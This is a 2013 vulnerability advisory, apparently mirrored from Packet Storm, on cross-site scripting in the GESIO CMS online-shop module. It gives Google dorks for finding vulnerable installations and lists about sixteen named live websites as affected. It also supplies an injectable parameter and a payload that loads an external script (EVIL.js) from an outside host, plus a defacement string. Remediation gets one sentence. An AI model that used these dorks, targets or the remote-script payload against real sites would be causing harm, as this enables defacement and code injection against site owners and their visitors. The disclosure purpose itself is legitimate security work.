Tienda Online CMS Cross Site Scripting

🗓️ 19 Apr 2013 00:00:00Reported by Ivan SanchezType

packetstorm🔗 packetstormsecurity.com👁 27 Views

Software Gestión GESIO CMS Cross Site Scripting vulnerability in Tienda Online module. Allows execution of evil remote code. Vendor notified multiple times. Affected sites include qualitycenter.es, greenhabit.es, and more. Remediation requires input validation and parameter sanitization

`+=============================================================================================+  
+ Software Gestión GESIO & XSS & Allow Execute Evil Remote Code +  
+=============================================================================================+  
  
  
Author(s): Ivan Sanchez & Raul Diaz  
  
Product: Software Gestión GESIO   
Web:http://www.gesio.com/  
Versions: Modulo / Tienda Online - CM  
Date: 18/04/2013  
  
Vendor Notified: 18/04   
Vendor Notified again: 19/04  
  
Extract:  
http://www.gesio.com/tienda-online-cms-89-50-431/  
"Tu tienda Online conectada a tu facturación diaria. Facturarás con el mismo sistema que vendes online.  
En GESIO® pensamos que un sistema de gestión online debe tener la posibilidad de desarrollar Tienda Online"   
  
  
GOOGLE DORKS:  
------------  
  
allintext:POLÍTICA DE PROTECCIÓN DE DATOS -Software Gestión GESIO®  
  
inurl:cms/site_0003  
  
  
Sites affected   
--------------------  
  
ALL SITES USING THIS CM  
  
http://www.qualitycenter.es/lp/  
http://www.greenhabit.es/lp/  
http://www.latiendadelhormigonimpreso.com/lp/  
http://www.minisub.es/lp/  
http://www.vitalarchery.com/lp/  
http://www.palacios-congresos-es.com/lcli/  
http://www.aulasconsoftware.com/lp/  
http://www.arthulencourt.eu/lp/  
http://www.soltercam.com/lp/  
http://www.sol-i-vent.es/lp/  
http://www.ale-hop.org/lp/  
http://creugal-hobby.com/lp/  
http://www.xipnet.es/lp/  
http://www.canterbury.es/lp/  
http://ociostock.com/lp/  
http://guatebloem.com/productos_listado.php  
  
much more....  
  
Attacks >>>>>>>>>>>>>>>>>>>  
  
  
XSS & REMOTE INJECTION CODE:  
---------------------------  
  
'">><marquee><h1>EvilCode Team</h1></marquee>  
  
Or  
  
"><script src=http://nullcode.com.ar/code/scripts/EVIL.js></script> EXTERNAL EVIL CODE !  
  
  
Parameter Affected:  
-------------------  
  
--form 1 --  
  
http://www.sites/comunicados_listado.php?filtro_texto= INJECT HERE  
  
and much more...  
  
Remediation:  
------------  
  
Could you please validate the input , sanitize each parameter.  
  
  
Thanks you so much!  
  
  
  
NULL CODE SERVICES [ www.evilcode.com.ar ] Hunting Security Bugs!  
+=============================================================================================+  
+ Software Gestión GESIO & XSS & Allow Execute Evil Remote Code +  
+=============================================================================================+  
`

19 Apr 2013 00:00Current

0.3Low risk

Vulners AI Score0.3